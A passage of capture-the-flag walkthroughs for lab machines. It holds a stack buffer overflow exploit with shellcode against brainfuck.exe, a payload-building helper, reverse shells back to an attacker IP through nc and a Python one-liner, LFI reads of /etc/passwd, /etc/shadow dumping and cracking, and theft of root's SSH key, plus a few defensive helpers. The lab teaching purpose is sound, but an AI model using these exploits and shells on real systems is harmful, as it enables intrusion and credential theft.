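            if reasons:
                findings[name] = (str(target), reasons)
    return findings


def demo():
    """Rebuild the /home/low/scripts layout from the page (constructed copy) and audit it."""
    d = Path(tempfile.mkdtemp())
    (d / "script.py").write_text('import main\nimport helper\nimport os\nos.system("ip a | grep enp0s3")\n')
    (d / "main.py").write_text('from os import system as main\nmain("whoami")\n')
    (d / "helper.py").write_text("X = 1\n")
    (d / "script.py").chmod(0o644)
    (d / "main.py").chmod(0o666)    # stands in for "owned by www-data": anyone can rewrite it
    (d / "helper.py").chmod(0o644)  # a clean sibling that must not be reported
    return audit(d / "script.py")


if __name__ == "__main__":
    for mod, (path, why) in demo().items():
        print(f"{mod}: {path}: {', '.join(why)}")
```

Point audit() at the real script (here /home/low/scripts/script.py) from a shell on the box; the same logic catches the more common variant where the script directory itself is writable and a module can be shadowed.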
Drop our public key into ~/.ssh/authorized_keys to get SSH access as low.
wget http://192.168.56.150/id_rsa.pub -O authorized_keys
chmod 600 authorized_keys
After logging in as low, run pspy64: the user debian (uid 1000) runs /home/debian/Documentos/backup/dissapeared.py from cron every minute.
2021/05/14 05:31:02 CMD: UID=0 PID=2240 | /usr/sbin/CRON -f
2021/05/14 05:31:02 CMD: UID=1000 PID=2241 | /usr/bin/python3 /home/debian/Documentos/backup/dissapeared.py
The script does not exist yet and the directory is writable, so create it with a reverse-shell payload.
low@debian:/home/debian/Documentos/backup$ echo 'import os;os.system("nc 192.168.56.150 2234 -e /bin/bash");' > dissapeared.py
Get a reverse shell as user debian.
nc -nlvp 2234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2234
Ncat: Listening on 0.0.0.0:2234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:45812.
id
uid=1000(debian) gid=1000(debian) grupos=1000(debian),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),114(lpadmin),115(scanner)
Spawn an interactive shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
Here we can upload id_rsa.pub again to get an SSH login.
Check sudo again.
debian@debian:~$ sudo -l
Matching Defaults entries for debian on debian:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User debian may run the following commands on debian:
(ALL : root) NOPASSWD: /bin/wine /opt/Buffer-Overflow-Vulnerable-app/brainfuck.exe
Run brainfuck.exe: it listens on port 9999 and reads user input.
[image-20210524180541022.png]
Disassembling brainfuck.exe, the vulnerability is in get_reply: strcpy() copies the attacker-controlled string into a 520-byte stack buffer with no length check.
int __cdecl get_reply(char *Source)
{
size_t v1; // eax
char Destination[520]; // [esp+10h] [ebp-208h] BYREF
printf("[get_reply] s = [%s]\n", Source);
strcpy(Destination, Source);
v1 = strlen(Destination);
printf("[get_reply] copied %d bytes to buffer\n", v1);
return strcmp(Destination, "shitstorm\n");
}
Destination is 520 bytes, followed by 4 bytes of saved ebp and then the 4-byte return address, so the return address sits at offset 524. Generate a test string:
python3 -c "print('a'*520+'bbbb'+'cccc')"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc
Testing on Windows under OllyDbg, the return address is overwritten exactly by 'cccc' (EIP = 0x63636363).
[image-20210524172438560.png]
brainfuck.exe also contains a jmp esp instruction, and its address has no NUL bytes, so it survives strcpy():
ropper --file brainfuck.exe --search 'jmp esp'
[INFO] Load gadgets for section: .text
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: jmp esp
[INFO] File: brainfuck.exe
0x311712f3: jmp esp;
Now we can build the exploit with the classic shellcode: junk up to the saved return address, the jmp esp address in little-endian, then the shellcode. After the ret, esp points just past the overwritten return address, so jmp esp lands on the shellcode. A Linux x86 execve shellcode works because brainfuck.exe runs under Wine on Linux.
#!/usr/bin/python3
import socket
target_ip='192.168.56.100'
target_port=9999
recv_buf=4096
# 520 bytes fill Destination, the next 4 overwrite the saved ebp
junk = b'a' *520+b'bbbb'
# address of "jmp esp" in brainfuck.exe, 0x311712f3, written little-endian
ret_addr=b'\xf3\x12\x17\x31'
# the classic Linux x86 execve("/bin//sh") shellcode; it works here because
# brainfuck.exe runs under Wine on Linux, so the process can make Linux syscalls
shell_code = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80'
payload = b''
payload += junk
payload += ret_addr
# after the ret, esp points just past ret_addr, i.e. at the shellcode
payload +=shell_code
with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as clientSock:
    clientSock.connect((target_ip,target_port))
    data_from_srv = clientSock.recv(recv_buf)   # banner from brainfuck.exe
    print(f"Reply --> {data_from_srv}")
    print(f"Sending --> {payload}")
    clientSock.sendall(payload)
Start brainfuck.exe with sudo on the VM and run exp.py from the attacking machine. Because the shellcode calls execve rather than connecting back, the root shell appears in the terminal where brainfuck.exe was launched.
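The exploit above found the offset by hand ('a'*520 + 'bbbb' + 'cccc') and typed the return address as raw bytes. The helper below is an added example, not part of the original exp.py: it generates a Metasploit-style cyclic pattern and looks up the offset from the value the debugger shows in EIP, then assembles the same junk | ret | shellcode layout with struct.pack and refuses payloads containing a NUL, which strcpy() would truncate at. The offset (524), the jmp esp address (0x311712f3) and the shellcode are the page's values; everything else is mine.

```python
#!/usr/bin/env python3
"""Payload construction for the brainfuck.exe stack overflow. Added example; not
part of the original exp.py. Offset, jmp esp address and shellcode are the page's."""
import string
import struct


def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1...): every 4-byte window is unique
    within the first 20280 bytes, so any EIP value maps back to one offset."""
    if length > 20280:
        raise ValueError("pattern longer than 20280 bytes is not unique")
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern, eip):
    """Offset in the pattern of the 4 bytes now in EIP. Pass the integer the debugger
    shows (converted here to memory order, little-endian) or the raw 4 bytes."""
    needle = struct.pack("<I", eip) if isinstance(eip, int) else eip
    off = pattern.find(needle)
    if off < 0:
        raise ValueError("value not found in pattern")
    return off


# the page's Linux x86 execve("/bin//sh") shellcode; brainfuck.exe runs under Wine
# on Linux, so Linux syscalls are available to the process
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
             b"\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80")


def build_payload(offset, ret_addr, shellcode=SHELLCODE, bad=b"\x00"):
    """junk up to the saved EIP, then the jmp esp address, then the shellcode.
    After ret, esp points right past the return address, i.e. at the shellcode."""
    payload = b"A" * offset + struct.pack("<I", ret_addr) + shellcode
    found = [hex(b) for b in bad if bytes([b]) in payload]  # strcpy() stops at a NUL
    if found:
        raise ValueError(f"bad bytes in payload: {found}")
    return payload


if __name__ == "__main__":
    pat = cyclic_pattern(600)
    eip = struct.unpack("<I", pat[524:528])[0]  # what the debugger would show after the crash
    print(f"EIP=0x{eip:08x} -> offset {pattern_offset(pat, eip)}")
    print(build_payload(524, 0x311712f3)[:8], "...")
```

Send `cyclic_pattern(600)` instead of the a/b/c string to crash the service, read EIP from OllyDbg, and `pattern_offset` returns 524; `build_payload(524, 0x311712f3)` is then byte-for-byte the payload exp.py sends.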
HackMyVm Otte Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Otte
Scan ports first.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for 192.168.56.100 (192.168.56.100)
Host is up (0.00099s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 89 May 15 12:25 note.txt
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 e8:38:58:1b:75:c5:53:47:32:10:d4:12:79:69:c8:ad (RSA)
| 256 35:92:34:4e:cd:65:c6:08:20:76:35:ba:d9:09:64:65 (ECDSA)
|_ 256 a2:87:9f:60:a4:0d:c5:43:6a:4f:02:79:56:ff:6e:d9 (ED25519)
80/tcp open http Apache httpd 2.4.38
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Siemens - Root authentification
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 401 Unauthorized
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Log in to FTP anonymously and get note.txt.
cat note.txt
Hi thomas ! I put on you personal folder the php code you asked me !
See you later +++
Port 80 requires authentication.
[image-20210523214949625.png]
Following the realm hint, search for Siemens router default credentials. (This step was hard for me because I have never used a Siemens router.)
https://www.192-168-1-1-ip.co/router/siemens/siemens/17622/
After some failures, we get working credentials.
root zP2wxY4uE
With the credentials we can scan for directories and files.
gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log -U root -P zP2wxY4uE
/index.php (Status: 200) [Size: 28]
/image (Status: 200) [Size: 47076]
/config.php (Status: 200) [Size: 0]
/thinkgeek.php (Status: 200) [Size: 28]
Fuzz the parameter name of thinkgeek.php.
wfuzz -u 'http://192.168.56.100/thinkgeek.php?FUZZ=id' -w /usr/share/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 28
000007535: 200 0 L 0 W 0 Ch "file"
Try LFI with it.
curl -u root:zP2wxY4uE 'http://192.168.56.100/thinkgeek.php?file=../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash
...
laetitia:x:1001:1001:,,,:/home/laetitia:/bin/bash
cedric:x:1002:1002:,,,:/home/cedric:/bin/bash
Following the hint in note.txt, fuzz for /home/thomas/*.php through the LFI.
wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/FUZZ.php' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 0
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000016344: 200 2 L 3 W 20 Ch "shell"
Fuzz the parameter name of shell.php, included through the LFI.
wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 20
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000004959: 200 3 L 6 W 74 Ch "command"
Call shell.php through the LFI with a reverse-shell command:
http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&command=nc%20192.168.56.150%201234%20-e%20/bin/bash
In another terminal, listen on port 1234 and catch the reverse shell.
nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:59386.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Upgrade to an interactive shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@otte:/var/www/html$
In /home/thomas there is nightmare.txt.
www-data@otte:/home/thomas$ ls -la
ls -la
total 100
drwxr-xr-x 4 thomas thomas 4096 May 20 09:46 .
drwxr-xr-x 5 root root 4096 May 16 12:34 ..
-rw------- 1 thomas thomas 50 May 20 09:46 .Xauthority
lrwxrwxrwx 1 thomas thomas 9 May 16 13:25 .bash_history -> /dev/null
-rw-r--r-- 1 thomas thomas 220 May 15 12:12 .bash_logout
-rw-r--r-- 1 thomas thomas 3526 May 17 14:42 .bashrc
drwxr-xr-x 3 thomas thomas 4096 May 15 14:00 .local
-rw-r--r-- 1 thomas thomas 807 May 15 12:12 .profile
drwx------ 2 thomas thomas 4096 May 17 09:35 .ssh
-rw-r--r-- 1 thomas thomas 61258 May 15 14:44 important_file
-rw-r--r-- 1 thomas thomas 122 May 15 14:56 nightmare.txt
-rwxr-xr-x 1 thomas thomas 93 May 17 09:15 shell.php
www-data@otte:/home/thomas$ cat nightmare.txt
cat nightmare.txt
who is the son of a bitch who replaced the signature on my file with fucking XXX?! I need to find the original signature!
www-data@otte:/home/thomas$
Download important_file to the local machine and look at it: the header is corrupted.
xxd important_file | head
00000000: XXXXXXXXXXXXXXXX 0000 000d 4948 4452 .XXX........IHDR
00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e ...,...,.....y}.
00000020: 7500 0000 1b74 4558 7443 7265 6174 696f u....tEXtCreatio
00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337 n Time.162100737
00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154 9529......7.IDAT
00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085 x.....~.U..... .
00000060: 2214 410a 2208 2294 8214 4428 8582 286a ".A."."...D(..(j
00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9 .P....b.(..I....
...
IHDR is the first chunk of a PNG, so this is a PNG whose 8-byte signature was overwritten with X's. Replace them with the standard signature 89 50 4E 47 0D 0A 1A 0A.
xxd important_file | head
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR
00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e ...,...,.....y}.
00000020: 7500 0000 1b74 4558 7443 7265 6174 696f u....tEXtCreatio
00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337 n Time.162100737
00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154 9529......7.IDAT
00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085 x.....~.U..... .
00000060: 2214 410a 2208 2294 8214 4428 8582 286a ".A."."...D(..(j
00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9 .P....b.(..I....
00000080: 7889 a931 3626 8d9a 8ba6 8947 3e5f ddb8 x..16&.....G>_..
00000090: ddee 99f5 ccac 35b3 67ef 773d 3090 7c7f ......5.g.w=0.|.
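Patching the eight bytes by hand works when you already know the answer. The helper below, an added example that is not from the walkthrough, does the same repair programmatically but first verifies that what follows really is a PNG IHDR chunk with a correct CRC, so it will not blindly stamp a PNG signature onto an arbitrary file. Its make_sample() builds a constructed header with the same IHDR values the dump above shows (300x300, 8-bit RGBA); the repaired file's own CRC is not asserted here.

```python
#!/usr/bin/env python3
"""Repair a PNG whose 8-byte signature was overwritten, after checking that the
first chunk is a well-formed IHDR with a valid CRC. Added example, not from the page."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\x0a"


def ihdr_is_valid(data):
    """True if bytes 8..33 hold an IHDR chunk (length 13) whose CRC checks out."""
    if len(data) < 33:
        return False
    length, ctype = struct.unpack(">I4s", data[8:16])
    if length != 13 or ctype != b"IHDR":
        return False
    # the CRC covers the chunk type and data, not the length field
    crc = struct.unpack(">I", data[29:33])[0]
    return zlib.crc32(data[12:29]) & 0xFFFFFFFF == crc


def repair_signature(data):
    """Return data with the PNG signature restored, or raise if it is not a PNG."""
    if data[:8] == PNG_SIG:
        return data
    if not ihdr_is_valid(data):
        raise ValueError("first chunk is not a valid IHDR; not a PNG with a damaged signature")
    return PNG_SIG + data[8:]


def is_repairable(data):
    try:
        repair_signature(data)
        return True
    except ValueError:
        return False


def ihdr_fields(data):
    """Width, height, bit depth and colour type from a (repaired) PNG header."""
    w, h, depth, ctype, _comp, _filt, _interlace = struct.unpack(">IIBBBBB", data[16:29])
    return {"width": w, "height": h, "bit_depth": depth, "color_type": ctype}


def make_sample(width=300, height=300):
    """Constructed minimal PNG header (signature + IHDR only) for offline testing."""
    body = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    crc = struct.pack(">I", zlib.crc32(b"IHDR" + body) & 0xFFFFFFFF)
    return PNG_SIG + struct.pack(">I", 13) + b"IHDR" + body + crc


if __name__ == "__main__":
    damaged = b"XXXXXXXX" + make_sample()[8:]   # what nightmare.txt describes
    print(ihdr_fields(repair_signature(damaged)))
```

For the real file, `repair_signature(open("important_file","rb").read())` writes back a header a normal viewer accepts; if ihdr_is_valid() fails on a suspect file, more than the signature was damaged and you need to look at the chunk layout before patching.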
Render the repaired PNG (CyberChef works): it is a QR code.
[image-20210523212230214.png]
Decode the QR code to get a link.
[image-20210523212429143.png]
Visit https://eqrcode.co/a/SVxQdM to get thomas's password.
Log in over SSH as thomas and check sudo.
thomas@otte:/home/laetitia$ sudo -l
Matching Defaults entries for thomas on otte:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User thomas may run the following commands on otte:
(laetitia) NOPASSWD: /usr/bin/python3 /home/laetitia/simpler.py *
Run simpler.py; when it asks for an IP, enter a shell command instead.
thomas@otte:/home/laetitia$ sudo -u laetitia /usr/bin/python3 /home/laetitia/simpler.py -p
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es
***********************************************
Enter an IP: $("/bin/bash")
laetitia@otte:~$
This shell is not interactive, so from it we run 'nc x.x.x.x xxxx -e /bin/bash' to get another, interactive reverse shell.
[image-20210523220810457.png]
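The escalation works because simpler.py hands the "IP" it is given to a shell. As an added example (my reconstruction of the pattern, not the real simpler.py source, whose exact checks are an assumption here), the legacy blacklist filter is shown next to a hardened version that parses the value as an IP address and passes it as a single argv element, so no shell ever sees it.

```python
import ipaddress
import subprocess

# Assumed legacy pattern: reject a handful of shell metacharacters, then build a
# command *string* that is later run through /bin/sh. Command substitution with
# $(...) contains none of the listed characters, so the string is accepted.
FORBIDDEN = [";", "&", "|", "`"]

def legacy_is_allowed(ip: str) -> bool:
    return not any(ch in ip for ch in FORBIDDEN)

def legacy_build_command(ip: str) -> str:
    if not legacy_is_allowed(ip):
        raise ValueError("forbidden character")
    return "ping -c 1 " + ip  # still interpreted by a shell when executed

# Hardened replacement: an allow-list parser (ipaddress rejects anything that is
# not an IPv4/IPv6 literal) plus argv-style execution, which bypasses the shell.
def validate_ip(value: str) -> str:
    return str(ipaddress.ip_address(value.strip()))

def hardened_ping_argv(value: str) -> list:
    return ["ping", "-c", "1", validate_ip(value)]

def hardened_ping(value: str) -> int:
    # No shell=True: the validated address is one argument, never re-parsed.
    return subprocess.run(hardened_ping_argv(value), check=False).returncode
```

A sudo rule that runs a script with `*` arguments is only as safe as the script's own input handling; the allow-list version closes the gap the blacklist leaves.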
Check sudo again, as laetitia.
laetitia@otte:~$ sudo -l
sudo -l
Matching Defaults entries for laetitia on otte:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User laetitia may run the following commands on otte:
(cedric) NOPASSWD: /usr/bin/w3m
Use php to start a temporary http server on the local machine, then use w3m to visit it on port 80 and spawn a shell.
sudo -u cedric /usr/bin/w3m http://192.168.56.150
Then run !/bin/bash; now we are user cedric.
[image-20210523221401950.png]
Upload our id_rsa.pub into /home/cedric/.ssh as authorized_keys.
wget http://192.168.56.150/id_rsa.pub -O authorized_keys
Then we can login ssh as cedric.
Check sudo again.
cedric@otte:~$ sudo -l
Matching Defaults entries for cedric on otte:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cedric may run the following commands on otte:
(ALL : ALL) NOPASSWD: /usr/bin/mmwatch
After checking the code of mmwatch, we can read root's id_rsa through it.
sudo /usr/bin/mmwatch "cat /root/.ssh/id_rsa"
Then we can login ssh as root.
root@otte:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
otte
root@otte:~# ls -la /root
total 40
drwx------ 4 root root 4096 May 20 10:30 .
drwxr-xr-x 18 root root 4096 May 15 12:07 ..
lrwxrwxrwx 1 root root 9 May 16 13:25 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 May 15 12:13 .local
-rw------- 1 root root 1500 May 15 13:23 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwx------ 1 root root 33 May 16 14:02 root.txt
drwx------ 2 root root 4096 May 16 13:24 .ssh
-rw-r--r-- 1 root root 173 May 15 12:19 .wget-hsts
-rw------- 1 root root 100 May 20 10:30 .Xauthority
Vulnhub hacksudo: FOG Walkthrough
https://www.vulnhub.com/entry/hacksudo-fog,697/
Scan open ports.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
111/tcp open rpcbind 2-4 (RPC #100000)
443/tcp open ssl/https Apache/2.4.38 (Debian)
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
...
43195/tcp open mountd 1-3 (RPC #100005)
45469/tcp open nlockmgr 1-4 (RPC #100021)
48871/tcp open mountd 1-3 (RPC #100005)
52195/tcp open mountd 1-3 (RPC #100005)
Scan folders/files on port 80 and download dict.txt.
gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-big.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.php (Status: 302) [Size: 0] [--> /fog/index.php]
/index.html (Status: 200) [Size: 853]
/index1.html (Status: 200) [Size: 329]
/cms (Status: 301) [Size: 314] [--> http://192.168.56.100/cms/]
/dict.txt (Status: 200) [Size: 1798]
/fog (Status: 301) [Size: 314] [--> http://192.168.56.100/fog/]
Found the username hacksudo on the cms page.
[image-20210518224756405.png]
Brute-force ftp.
hydra -l hacksudo -P dict.txt -t 32 192.168.56.100 ftp -f
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-18 22:38:34
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 32 tasks per 1 server, overall 32 tasks, 196 login tries (l:1/p:196), ~7 tries per task
[DATA] attacking ftp://192.168.56.100:21/
[21][ftp] host: 192.168.56.100 login: hacksudo password: hackme
[STATUS] attack finished for 192.168.56.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Download secr3tSteg.zip.
ftp> ls -la
200 PORT command successful
150 Connecting to port 43827
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 03:34 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 03:34 ..
-rw-r--r-- 1 33 33 389 May 7 03:34 flag1.txt
drwxr-xr-x 2 0 0 4096 May 6 13:57 hacksudo_ISRO_bak
226-Options: -a -l
226 4 matches total
ftp> cd hacksudo_ISRO_bak
250 OK. Current directory is /hacksudo_ISRO_bak
ftp> ls -la
200 PORT command successful
150 Connecting to port 46515
drwxr-xr-x 2 0 0 4096 May 6 13:57 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 03:34 ..
-rw-r--r-- 1 0 0 63 May 5 11:07 authors.txt
-rw-r--r-- 1 0 0 0 May 6 11:36 installfog
-rw-r--r-- 1 0 0 1573833 May 6 19:24 secr3tSteg.zip
Brute-force the zip password.
fcrackzip -u -D -p /usr/share/wordlists/rock_ascii.txt secr3tSteg.zip
PASSWORD FOUND!!!!: pw == fooled
Download SoundStegno, which is referenced in the source code of index1.html.
[image-20210519103824772.png]
Extract the hidden message from the wav file unzipped from secr3tSteg.zip to get hints.
python3 /opt/SoundStegno/ExWave.py -f ./hacksudoSTEGNO.wav
...
Visit for more tutorials : www.youtube.com/techchipnet
Hide your text message in wave audio file like MR.ROBOT
Please wait...
Your Secret Message is: Shift by 3
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR
Decrypt Caesar message at http://rumkin.com/tools/cipher/caesar-keyed.php.
[image-20210518224455131.png]
Log in to the cms with hacksudo:hacksudoISRO. Found cmsmsrce.txt.
[image-20210518224924381.png]
Check the content of the txt file.
[image-20210519104218050.png]
Copy cmsmsrce.txt to shell.php, then visit the following address in the browser.
http://192.168.56.100/cms/uploads/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27
At the same time, listen on port 1234 in another terminal to get a reverse shell.
[image-20210519104609411.png]
Find SUID files.
find / -perm -u=s 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/mount.nfs
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/look
/usr/bin/mount
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
Use look to read /etc/shadow.
www-data@hacksudo:/home$ look '' /etc/shadow
look '' /etc/shadow
root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/:18756:0:99999:7:::
...
isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::
dnsmasq:*:18756:0:99999:7:::
Crack isro's password.
john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt fish-0 | 0 [23:32:44]
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty (isro)
Log in via ssh as user isro. Check sudo, but it is a rabbit hole.
ssh isro@192.168.56.100
isro@192.168.56.100's password:
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 18 11:33:26 2021 from 192.168.56.150
isro@hacksudo:~$ sudo -l
[sudo] password for isro:
Matching Defaults entries for isro on hacksudo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User isro may run the following commands on hacksudo:
(root) /usr/bin/ls /home/isro/*
isro@hacksudo:~$
In /home/isro/fog, found an executable file owned by root.
isro@hacksudo:~$ ls -la
total 40
drwxr-x--- 5 isro isro 4096 May 18 12:16 .
drwxr-xr-x 6 root root 4096 May 8 12:25 ..
-rw------- 1 root isro 41 May 18 11:44 .bash_history
-rw-r--r-- 1 isro isro 0 May 5 14:05 .bash_logout
-rw-r--r-- 1 isro isro 4623 May 13 04:59 .bashrc
drwxr-xr-x 2 isro isro 4096 May 13 05:06 fog
drwx------ 3 isro isro 4096 May 5 14:09 .gnupg
drwxr-xr-x 3 isro isro 4096 May 5 14:11 .local
-rw-r--r-- 1 isro isro 0 May 5 14:05 .profile
-r-------- 1 isro isro 33 May 6 14:31 user.txt
-rw------- 1 isro isro 54 May 18 12:16 .Xauthority
isro@hacksudo:~$ cd fog
isro@hacksudo:~/fog$ ls -la
total 3700
drwxr-xr-x 2 isro isro 4096 May 13 05:06 .
drwxr-x--- 5 isro isro 4096 May 18 12:16 ..
-rwxr-xr-x 1 root isro 16712 May 12 13:46 fog
-rw-r--r-- 1 isro isro 0 May 6 14:30 get
-rwxr-xr-x 1 isro isro 69368 May 6 14:29 ping
-rwxr-xr-x 1 isro isro 3689352 May 6 14:30 python
